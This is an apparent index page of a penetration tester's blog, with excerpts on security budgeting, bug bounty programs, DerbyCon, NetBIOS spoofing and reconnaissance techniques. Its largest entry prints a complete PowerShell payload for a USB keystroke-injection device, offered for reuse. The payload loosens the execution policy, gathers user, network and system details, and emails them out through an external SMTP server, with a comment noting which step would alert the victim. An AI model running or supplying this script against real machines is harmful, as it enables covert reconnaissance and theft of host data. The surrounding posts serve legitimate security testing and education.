Why I didn't budget for a penetration test in 2024

BLUF

Competing priorities, cost-consciousness, and lower-hanging security fruit were the reasons penetration testing didn’t make it into my AOP this year. I’m not in a highly regulated environment, though; if regular penetration testing is a requirement for you, your options are limited, but here are some things to consider.

Analysis

Each offensive security consultancy and penetration tester has their own methodology. Penetration testing isn’t guaranteed to find your most prevalent vulnerability, nor your most difficult, movie-plot security threat. It should, more often than not, find your lowest-hanging fruit. Nothing in life is guaranteed, so you may find you spent five figures to learn that those critical vulnerabilities your vuln scanner has complained about for weeks are, in fact, critical vulnerabilities that attackers will abuse to gain access to your data. ...

May 21, 2024 · 3 min · 570 words · Chris

Changing Direction

How my career is changing.

January 17, 2020 · 1 min · Chris

Public Bug Bounty Rules of Engagement

I share my experience and lessons learned from operating a public bug bounty.

April 9, 2019 · 2 min · Chris

A Lesson for Bug Bounty Researchers

I’m managing a bug bounty program that has shown tremendous benefit so far. Several findings have been extremely clever, and I’ve been fortunate enough to have good interactions with the vulnerability researchers. However, I’ve also had a few unsatisfactory interactions with researchers. This post is directed at Bug Bounty researchers that do not have much experience in corporate environments. I think a list of do’s and don’ts is appropriate for this breakdown. ...

October 20, 2017 · 4 min · Chris

RubberDucky Powershell Payload

On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments:

```powershell
# Set execution policy to allow unrestricted script scope
Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

# Create results file in current user's temp directory
$results = $env:temp + '\results.txt'

# Run whoami
$who = 'whoami.exe'
$rwho = & $who

# Run ipconfig /all
$ipc = 'ipconfig.exe'
$ipcs = '/all'
$ripc = & $ipc $ipcs

# Run systeminfo (the call operator runs it synchronously, so the
# sleep below is only a safety margin on slow hosts)
$sysi = 'systeminfo.exe'
$rsysi = & $sysi

# Wait for systeminfo to finish
Start-Sleep -s 5

# Write results: pipe the three outputs as an array so each line is
# written on its own line instead of being joined into one string
$rwho, $ripc, $rsysi | Out-File $results

# Send results to e-mail address
$hostname = $env:computername
$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
$SMTPInfo.EnableSsl = $true
# The .NET type is NetworkCredential (singular)
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('<yourusername>', '<yourpassword>')
$ResultMail = New-Object System.Net.Mail.MailMessage
$ResultMail.From = '<fromaddress>'
$ResultMail.To.Add('<destinationmail>')
# Put the host name in the subject so results from several machines can be told apart
$ResultMail.Subject = "Results from $hostname"
$ResultMail.Body = "Mail Body"
$ResultMail.Attachments.Add($results)
$SMTPInfo.Send($ResultMail)

# Optional pop-up confirmation box
# Note: This WILL raise user suspicion
$wshell = New-Object -ComObject Wscript.Shell
$wshell.Popup("Operation Complete.", 0, "OK", 0x1)
```

Merry Christmas and Happy Holidays! ...

December 22, 2014 · 1 min · Chris

DerbyCon 4.0

Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in person:

Ed Skoudis: How To Give The Best Pen Test Of Your Life

If you’re a pen tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk!

After competing for Friday night, most of Saturday, and Sunday morning, I finished in 30th place (solo) out of the 120 teams competing in the CTF. Not bad, but I want to do better! ...

October 1, 2014 · 1 min · Chris

NetBIOS Name Spoofing and SMB

NBNS still works!

June 5, 2014 · 4 min · Chris

How to create a Metasploit module

Learn how to create a Metasploit module.

December 13, 2013 · 7 min · Chris

DNS Recon

Introductory methods for DNS reconnaissance.

November 22, 2013 · 6 min · Chris

Subdomain Enumeration

Techniques for performing subdomain enumeration information gathering.

October 7, 2013 · 3 min · Chris